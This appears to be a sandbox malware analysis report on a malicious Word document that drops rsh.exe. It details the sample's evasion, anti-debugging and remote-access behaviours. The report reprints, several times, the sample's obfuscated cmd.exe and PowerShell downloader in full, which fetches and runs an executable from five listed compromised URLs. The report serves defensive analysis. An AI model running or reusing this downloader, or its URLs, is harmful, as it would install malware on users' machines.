Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Checks the free space of harddrives

Show sources

Source: C:\Users\user\AppData\Local\Temp\rsh.exe

File Volume queried: C:\ FullSizeInformation

Contains functionality to enumerate running services

Show sources

Source: C:\Users\user\AppData\Local\Temp\rsh.exe	Code function: EnumServicesStatusExW,GetTickCount,OpenServiceW,		19_2_0021F71D
Source: C:\Users\user\AppData\Local\Temp\rsh.exe	Code function: EnumServicesStatusExW,GetLastError,		19_2_0021F6C4

Contains long sleeps (>= 3 min)

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Enumerates the file system

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows

Found large amount of non-executed APIs

Show sources

Source: C:\Windows\System32\echoshims.exe

API coverage: 9.3 %

May sleep (evasive loops) to hinder dynamic analysis

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4016	Thread sleep time: -180000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3204	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3576	Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3692	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\rsh.exe TID: 3664	Thread sleep time: -60000s >= -30000s

Queries disk information (often used to detect virtual machines)

Show sources

Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE

File opened: PhysicalDrive0

Sample execution stops while process was sleeping (likely an evasion)

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed

May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)

Show sources

Source: powershell.exe, 0000000F.00000002.1061012027.04574000.00000004.sdmp

Binary or memory string: vmbusres.dll

Queries a list of all running processes

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Anti Debugging:

Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

System information queried: KernelDebuggerInformation

Checks if the current process is being debugged

Show sources

Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE	Process queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE	Process queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE	Process queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE	Process queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE	Process queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE	Process queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE	Process queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE	Process queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE	Process queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE	Process queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE	Process queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE	Process queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE	Process queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE	Process queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE	Process queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE	Process queried: DebugPort

Contains functionality to dynamically determine API calls

Show sources

Source: C:\Users\user\AppData\Local\Temp\rsh.exe

Code function: 18_2_00211A36 LoadLibraryA,GetProcAddress,

18_2_00211A36

Contains functionality to read the PEB

Show sources

Source: C:\Users\user\AppData\Local\Temp\rsh.exe	Code function: 18_2_00211530 mov eax, dword ptr fs:[00000030h]	18_2_00211530
Source: C:\Users\user\AppData\Local\Temp\rsh.exe	Code function: 18_2_002121B0 mov eax, dword ptr fs:[00000030h]	18_2_002121B0
Source: C:\Users\user\AppData\Local\Temp\rsh.exe	Code function: 19_2_00211530 mov eax, dword ptr fs:[00000030h]	19_2_00211530
Source: C:\Users\user\AppData\Local\Temp\rsh.exe	Code function: 19_2_002121B0 mov eax, dword ptr fs:[00000030h]	19_2_002121B0
Source: C:\Windows\System32\echoshims.exe	Code function: 20_2_00541530 mov eax, dword ptr fs:[00000030h]	20_2_00541530
Source: C:\Windows\System32\echoshims.exe	Code function: 20_2_005421B0 mov eax, dword ptr fs:[00000030h]	20_2_005421B0
Source: C:\Windows\System32\echoshims.exe	Code function: 21_2_003E1530 mov eax, dword ptr fs:[00000030h]	21_2_003E1530
Source: C:\Windows\System32\echoshims.exe	Code function: 21_2_003E21B0 mov eax, dword ptr fs:[00000030h]	21_2_003E21B0

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Show sources

Source: C:\Users\user\AppData\Local\Temp\rsh.exe

Code function: 18_2_001F222C GetProcessHeap,GetProcessHeap,RtlAllocateHeap,lstrcmp,GetProcessHeap,HeapFree,GetCurrentProcessId,GetCurrentProcess,wsprintfA,

18_2_001F222C

Enables debug privileges

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug

Creates guard pages, often used to prevent reverse engineering and debugging

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion:

Creates a process in suspended mode (likely to inject code)

Show sources

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /V/C'set NO= }}{hctac}}kaerb;miZ$ ssecorP-tratS;)miZ$(elifotevas.icW$;)ydoBesnopser.pFo$(etirw.icW$;1 = epyt.icW$;)(nepo.icW${ )'ZM' ekil- txetesnopser.pFo$( fI;)(dnes.pFo$;)0,kkN$,'TEG'(nepo.pFo${yrt{)jLw$ ni kkN$(hcaerof;'maerts.bdoda' moc- tcejbO-weN = icW$;'ptthlmx.2lmxsm' moc- tcejbO-weN= pFo$;)'exe.hsr\'+)(htaPpmeTteG::]htaP.OI.metsyS[(=miZ$;)'@'(tilpS.'ZQgHugt/ehcac/rotartsinimda/ur.sur-yelwon//:ptth@4VdQeG/moc.steemerutnev//:ptth@I4ow42l/20000/tnetnoc-pw/ra.ude.tnu.noisnetxeairaterces//:ptth@Zt5waA/moc.sruotocetpyge//:ptth@Vwguf1ym/moc.ruot-xnihps//:ptth'=jLw$;'Hww'=Ftz$ llehsrewop&&for /L %U in (601;-1;0)do set jtC=!jtC!!NO:~%U,1!&&if %U equ 0 powershell '!jtC:*jtC!=!' '
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell 'powershell $ztF='wwH';$wLj='http://sphinx-tour.com/my1fugwV@http://egyptecotours.com/Aaw5tZ@http://secretariaextension.unt.edu.ar/wp-content/00002/l24wo4I@http://venturemeets.com/GeQdV4@http://nowley-rus.ru/administrator/cache/tguHgQZ'.Split('@');$Zim=([System.IO.Path]::GetTempPath()+'\rsh.exe');$oFp =New-Object -com 'msxml2.xmlhttp';$Wci = New-Object -com 'adodb.stream';foreach($Nkk in $wLj){try{$oFp.open('GET',$Nkk,0);$oFp.send();If ($oFp.responsetext -like 'MZ') {$Wci.open();$Wci.type = 1;$Wci.write($oFp.responseBody);$Wci.savetofile($Zim);Start-Process $Zim;break}}catch{}} '
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' =wwH
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\rsh.exe 'C:\Users\user\AppData\Local\Temp\rsh.exe'
Source: C:\Users\user\AppData\Local\Temp\rsh.exe	Process created: C:\Users\user\AppData\Local\Temp\rsh.exe C:\Users\user\AppData\Local\Temp\rsh.exe
Source: C:\Windows\System32\echoshims.exe	Process created: C:\Windows\System32\echoshims.exe C:\Windows\system32\echoshims.exe

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Show sources

Source: unknown	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c C:\Windows\system32\cmd.exe /V/C'set NO= }}{hctac}}kaerb;miZ$ ssecorP-tratS;)miZ$(elifotevas.icW$;)ydoBesnopser.pFo$(etirw.icW$;1 = epyt.icW$;)(nepo.icW${ )'ZM' ekil- txetesnopser.pFo$( fI;)(dnes.pFo$;)0,kkN$,'TEG'(nepo.pFo${yrt{)jLw$ ni kkN$(hcaerof;'maerts.bdoda' moc- tcejbO-weN = icW$;'ptthlmx.2lmxsm' moc- tcejbO-weN= pFo$;)'exe.hsr\'+)(htaPpmeTteG::]htaP.OI.metsyS[(=miZ$;)'@'(tilpS.'ZQgHugt/ehcac/rotartsinimda/ur.sur-yelwon//:ptth@4VdQeG/moc.steemerutnev//:ptth@I4ow42l/20000/tnetnoc-pw/ra.ude.tnu.noisnetxeairaterces//:ptth@Zt5waA/moc.sruotocetpyge//:ptth@Vwguf1ym/moc.ruot-xnihps//:ptth'=jLw$;'Hww'=Ftz$ llehsrewop&&for /L %U in (601;-1;0)do set jtC=!jtC!!NO:~%U,1!&&if %U equ 0 powershell '!jtC:*jtC!=!' '
Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /V/C'set NO= }}{hctac}}kaerb;miZ$ ssecorP-tratS;)miZ$(elifotevas.icW$;)ydoBesnopser.pFo$(etirw.icW$;1 = epyt.icW$;)(nepo.icW${ )'ZM' ekil- txetesnopser.pFo$( fI;)(dnes.pFo$;)0,kkN$,'TEG'(nepo.pFo${yrt{)jLw$ ni kkN$(hcaerof;'maerts.bdoda' moc- tcejbO-weN = icW$;'ptthlmx.2lmxsm' moc- tcejbO-weN= pFo$;)'exe.hsr\'+)(htaPpmeTteG::]htaP.OI.metsyS[(=miZ$;)'@'(tilpS.'ZQgHugt/ehcac/rotartsinimda/ur.sur-yelwon//:ptth@4VdQeG/moc.steemerutnev//:ptth@I4ow42l/20000/tnetnoc-pw/ra.ude.tnu.noisnetxeairaterces//:ptth@Zt5waA/moc.sruotocetpyge//:ptth@Vwguf1ym/moc.ruot-xnihps//:ptth'=jLw$;'Hww'=Ftz$ llehsrewop&&for /L %U in (601;-1;0)do set jtC=!jtC!!NO:~%U,1!&&if %U equ 0 powershell '!jtC:*jtC!=!' '
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell 'powershell $ztF='wwH';$wLj='http://sphinx-tour.com/my1fugwV@http://egyptecotours.com/Aaw5tZ@http://secretariaextension.unt.edu.ar/wp-content/00002/l24wo4I@http://venturemeets.com/GeQdV4@http://nowley-rus.ru/administrator/cache/tguHgQZ'.Split('@');$Zim=([System.IO.Path]::GetTempPath()+'\rsh.exe');$oFp =New-Object -com 'msxml2.xmlhttp';$Wci = New-Object -com 'adodb.stream';foreach($Nkk in $wLj){try{$oFp.open('GET',$Nkk,0);$oFp.send();If ($oFp.responsetext -like 'MZ') {$Wci.open();$Wci.type = 1;$Wci.write($oFp.responseBody);$Wci.savetofile($Zim);Start-Process $Zim;break}}catch{}} '
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c C:\Windows\system32\cmd.exe /V/C'set NO= }}{hctac}}kaerb;miZ$ ssecorP-tratS;)miZ$(elifotevas.icW$;)ydoBesnopser.pFo$(etirw.icW$;1 = epyt.icW$;)(nepo.icW${ )'ZM' ekil- txetesnopser.pFo$( fI;)(dnes.pFo$;)0,kkN$,'TEG'(nepo.pFo${yrt{)jLw$ ni kkN$(hcaerof;'maerts.bdoda' moc- tcejbO-weN = icW$;'ptthlmx.2lmxsm' moc- tcejbO-weN= pFo$;)'exe.hsr\'+)(htaPpmeTteG::]htaP.OI.metsyS[(=miZ$;)'@'(tilpS.'ZQgHugt/ehcac/rotartsinimda/ur.sur-yelwon//:ptth@4VdQeG/moc.steemerutnev//:ptth@I4ow42l/20000/tnetnoc-pw/ra.ude.tnu.noisnetxeairaterces//:ptth@Zt5waA/moc.sruotocetpyge//:ptth@Vwguf1ym/moc.ruot-xnihps//:ptth'=jLw$;'Hww'=Ftz$ llehsrewop&&for /L %U in (601;-1;0)do set jtC=!jtC!!NO:~%U,1!&&if %U equ 0 powershell '!jtC:*jtC!=!' '
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /V/C'set NO= }}{hctac}}kaerb;miZ$ ssecorP-tratS;)miZ$(elifotevas.icW$;)ydoBesnopser.pFo$(etirw.icW$;1 = epyt.icW$;)(nepo.icW${ )'ZM' ekil- txetesnopser.pFo$( fI;)(dnes.pFo$;)0,kkN$,'TEG'(nepo.pFo${yrt{)jLw$ ni kkN$(hcaerof;'maerts.bdoda' moc- tcejbO-weN = icW$;'ptthlmx.2lmxsm' moc- tcejbO-weN= pFo$;)'exe.hsr\'+)(htaPpmeTteG::]htaP.OI.metsyS[(=miZ$;)'@'(tilpS.'ZQgHugt/ehcac/rotartsinimda/ur.sur-yelwon//:ptth@4VdQeG/moc.steemerutnev//:ptth@I4ow42l/20000/tnetnoc-pw/ra.ude.tnu.noisnetxeairaterces//:ptth@Zt5waA/moc.sruotocetpyge//:ptth@Vwguf1ym/moc.ruot-xnihps//:ptth'=jLw$;'Hww'=Ftz$ llehsrewop&&for /L %U in (601;-1;0)do set jtC=!jtC!!NO:~%U,1!&&if %U equ 0 powershell '!jtC:*jtC!=!' '
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell 'powershell $ztF='wwH';$wLj='http://sphinx-tour.com/my1fugwV@http://egyptecotours.com/Aaw5tZ@http://secretariaextension.unt.edu.ar/wp-content/00002/l24wo4I@http://venturemeets.com/GeQdV4@http://nowley-rus.ru/administrator/cache/tguHgQZ'.Split('@');$Zim=([System.IO.Path]::GetTempPath()+'\rsh.exe');$oFp =New-Object -com 'msxml2.xmlhttp';$Wci = New-Object -com 'adodb.stream';foreach($Nkk in $wLj){try{$oFp.open('GET',$Nkk,0);$oFp.send();If ($oFp.responsetext -like 'MZ') {$Wci.open();$Wci.type = 1;$Wci.write($oFp.responseBody);$Wci.savetofile($Zim);Start-Process $Zim;break}}catch{}} '

Language, Device and Operating System Detection:

Queries the installation date of Windows

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate

Queries the volume information (name, serial number etc) of a device

Show sources

Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\rsh.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\echoshims.exe	Queries volume information: C:\ VolumeInformation

Contains functionality to query windows version

Show sources

Source: C:\Users\user\AppData\Local\Temp\rsh.exe

Code function: 18_2_0021277F RtlGetVersion,GetNativeSystemInfo,

18_2_0021277F

Queries the cryptographic machine GUID

Show sources

Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Remote Access Functionality:

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Show sources

Source: C:\Users\user\AppData\Local\Temp\rsh.exe	Code function: 18_2_0040131D GetCommandLineW,OffsetRgn,AddClipboardFormatListener,NotifyWinEvent,AllocateLocallyUniqueId,DdeAddData,VarI2FromBool,VarI2FromBool,DosDateTimeToFileTime,DosDateTimeToFileTime,		18_2_0040131D
Source: C:\Users\user\AppData\Local\Temp\rsh.exe	Code function: 19_2_0040131D GetCommandLineW,OffsetRgn,AddClipboardFormatListener,NotifyWinEvent,AllocateLocallyUniqueId,DdeAddData,VarI2FromBool,VarI2FromBool,DosDateTimeToFileTime,DosDateTimeToFileTime,		19_2_0040131D

Behavior Graph

Simulations

Behavior and APIs

Time	Type	Description
13:59:43	API Interceptor	398x Sleep call for process: AcroRd32.exe modified
14:00:54	API Interceptor	5x Sleep call for process: WINWORD.EXE modified
14:00:57	API Interceptor	3x Sleep call for process: OSPPSVC.EXE modified
14:01:08	API Interceptor	41x Sleep call for process: powershell.exe modified
14:01:39	API Interceptor	2x Sleep call for process: rsh.exe modified

Antivirus Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label
19.2.rsh.exe.1f0000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen
18.2.rsh.exe.1f0000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen
19.2.rsh.exe.210000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen
20.2.echoshims.exe.180000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen
20.2.echoshims.exe.540000.2.unpack	100%	Avira	TR/Crypt.XPACK.Gen
18.2.rsh.exe.210000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen
21.2.echoshims.exe.3c0000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen
21.2.echoshims.exe.3e0000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen

Domains

No Antivirus matches

URLs

No Antivirus matches

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Memory Dumps

No yara matches

Unpacked PEs

No yara matches

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
CIZGITR	90000295800.doc.js	123734da46ee1db7a4026ad2726d0259d65c418c306b407c56ae30244c8b1871	malicious	Browse	94.73.149.158
	http://www.sedatalpdoner.com/Invoices_US-06132018-01/7/		malicious	Browse	94.73.145.234
	emotet.doc	72c654e81e3795877f0159ae56553d29599e34e82c7cb5dfc3fb376cb3a21cc7	malicious	Browse	94.73.148.47
	UPS-Billing-US-958.doc	cf69d2240b29b3498add780c4b5fac80d2ab6406d7bdd52a96efc7c1c320e2a0	malicious	Browse	94.73.146.147
	inv-FO-305240.doc	7fe4bdaebf945a3cd5c85dd57cf20157db6e5165b743435f746d7b0bd07f7ace	malicious	Browse	94.73.147.169
	DHL number - Freitag, 14_00-18_00 Uh.doc	f2c618ac512ac31acce1e4c3cb3d83350af3fb68c582c4a4ebecde634420aff7	malicious	Browse	94.73.150.88
	26FACT-15S83629.doc	08cc56b08393ee2edd67ae570bfed83e5e610130600b08ca5169d1924df0fbcb	malicious	Browse	94.73.151.220
	27FACT-JRO9045835.doc	049323b2e949c0486d41885a2cbd2fd50329483759abe65cff1ab0b79335ed26	malicious	Browse	94.73.151.220
	65FA-A2Q38566.doc	d1f85372d26c8018e251a4cafb3cad69377774e5e56ef26e93ebe64ef370b776	malicious	Browse	94.73.151.220
	60DOC-C2782.doc	52cb575389638a30c9276b29aeaa8da8efb1633e5c60dbe9e67d741cdef38e00	malicious	Browse	94.73.150.47
	7FILE-81469278991.doc	bfaf103e6c706c98128fb4c5ae4496126b1ccc9825d3a99f9dc1ddebc6212710	malicious	Browse	94.73.150.47
	19DOC-X75736.doc	31544eff65947f587c75f1da7369f278241e6e6414fb200cb0957decca112ede	malicious	Browse	94.73.150.47
	41FILE-70152384.doc	891b75404006558c4dce5826570d0e828993816f98b8ef199dfc328252e1de71	malicious	Browse	94.73.150.47
	430#U0437.js	01cf37dcee4378bfb57613ac7498738d0ecaf5e6f1f919d08756fdb9e82597e1	malicious	Browse	94.73.147.215
	430#U0437.js	01cf37dcee4378bfb57613ac7498738d0ecaf5e6f1f919d08756fdb9e82597e1	malicious	Browse	94.73.147.215
	430#U0437.js	3b03649795c97c5b74c5e0e2a938f75a47c24fa296188447cb630b3f83a624bf	malicious	Browse	94.73.172.4
	INV-W15-68Q5316.doc	f0610a8edcb9b5c65adc14a5dd599cec787300de7f0f32f88018ebbc8f13dea5	malicious	Browse	94.73.172.4
	INVOICE_NN6267_FILE.doc	c7c752905ac519eccba27f1b9408bf43f5e666d710376bf325a021e2d2a8aa5b	malicious	Browse	94.73.149.48
	90000295800.doc.js	123734da46ee1db7a4026ad2726d0259d65c418c306b407c56ae30244c8b1871	malicious	Browse	94.73.149.158
	http://logoswift.net/Invoice/		malicious	Browse	94.73.148.248
AS-26496-GO-DADDY-COM-LLC-GoDaddycomLLCUS	1Purchase Order.exe	5521cbec932e426f2bd3e200e2c6b0d1e9310604d216e397e788f41a163fce14	malicious	Browse	184.168.221.36
	57xibanfkphz.exe	b9951284e71c0af5e0d9662c0dfea3db8afcb3e065cb5a3704c91eac5da74e98	malicious	Browse	107.180.57.111
	57New Order 832873242.exe	d4b11bd2c4bfb92258c033806c5d8ae57b3bf6a487e827ebd73dc3680d30c9bc	malicious	Browse	184.168.221.46
	67New Order 73286325.exe	4a11328a15aa85922bc06fb76c6cbbc22b44afe44c415f6e8c0d352a7dd51cdc	malicious	Browse	184.168.221.46
	48SWIFT SCAN 833764663635 pdf.exe	1fb42894a9e493386a586c149f61e8597d2c584c6a17c675e90948d756e6b15f	malicious	Browse	50.63.202.44
	http://leemitchell.com/?reqp=1&reqr=		malicious	Browse	208.109.6.36
	Invoice #189938677510.doc	67c3c3a72115570e6f6a609dbf6f115aa2031fa1ef540742e3ece81776cbe72a	malicious	Browse	173.201.20.6
	Invoice #189938677510.doc	67c3c3a72115570e6f6a609dbf6f115aa2031fa1ef540742e3ece81776cbe72a	malicious	Browse	173.201.20.6
	Rechnungs-Details # 828256704534.doc	7a713785ef3669c72a5c1cff9368af89bb816483caaaf0e02171f08ae6b256ed	malicious	Browse	43.255.154.28
